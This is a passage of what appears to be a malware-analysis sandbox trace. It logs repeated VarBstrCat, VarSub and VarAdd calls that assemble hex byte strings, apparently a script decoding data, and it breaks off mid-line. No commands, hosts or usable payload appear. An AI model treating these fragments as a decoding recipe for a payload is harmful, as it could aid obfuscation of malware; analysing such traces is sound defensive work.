VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.281] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.281] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.281] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.281] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.281] VarBstrCat (in: bstrLeft="&H8", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.281] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.281] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.281] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.281] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.281] VarBstrCat (in: bstrLeft="&H1", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.281] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.281] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.281] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.282] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.282] VarBstrCat (in: bstrLeft="&H7", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.282] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.282] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.282] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.282] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.282] VarBstrCat (in: bstrLeft="&H8", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.282] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.282] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.282] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.282] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.282] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.282] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.283] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.283] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.283] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.283] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.283] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.283] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.283] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.283] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.283] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.283] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.283] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.283] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.283] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.283] VarBstrCat (in: bstrLeft="&Hf", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.283] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.284] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.284] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.284] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.284] VarBstrCat (in: bstrLeft="&H0", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.284] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.284] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.284] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.284] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.284] VarBstrCat (in: bstrLeft="&H2", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.284] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.284] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.284] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.284] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.284] VarBstrCat (in: bstrLeft="&Ha", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.285] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.285] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.285] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.285] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.285] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.285] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.285] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.285] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.285] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.285] VarBstrCat (in: bstrLeft="&Ha", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.285] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.285] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.285] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.285] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.285] VarBstrCat (in: bstrLeft="&Ha", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.286] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.286] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.286] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.286] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.286] VarBstrCat (in: bstrLeft="&Ha", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.286] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.286] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.286] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.286] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.286] VarBstrCat (in: bstrLeft="&Ha", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.286] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.286] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.286] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.286] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.287] VarBstrCat (in: bstrLeft="&Ha", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.287] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.287] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.287] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.287] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.323] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.323] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.325] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.328] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.329] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.330] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.331] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.331] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.331] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.331] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.331] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.336] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.336] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.337] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.338] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.339] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.339] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.339] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.340] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.341] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.342] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.343] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.345] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.346] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, 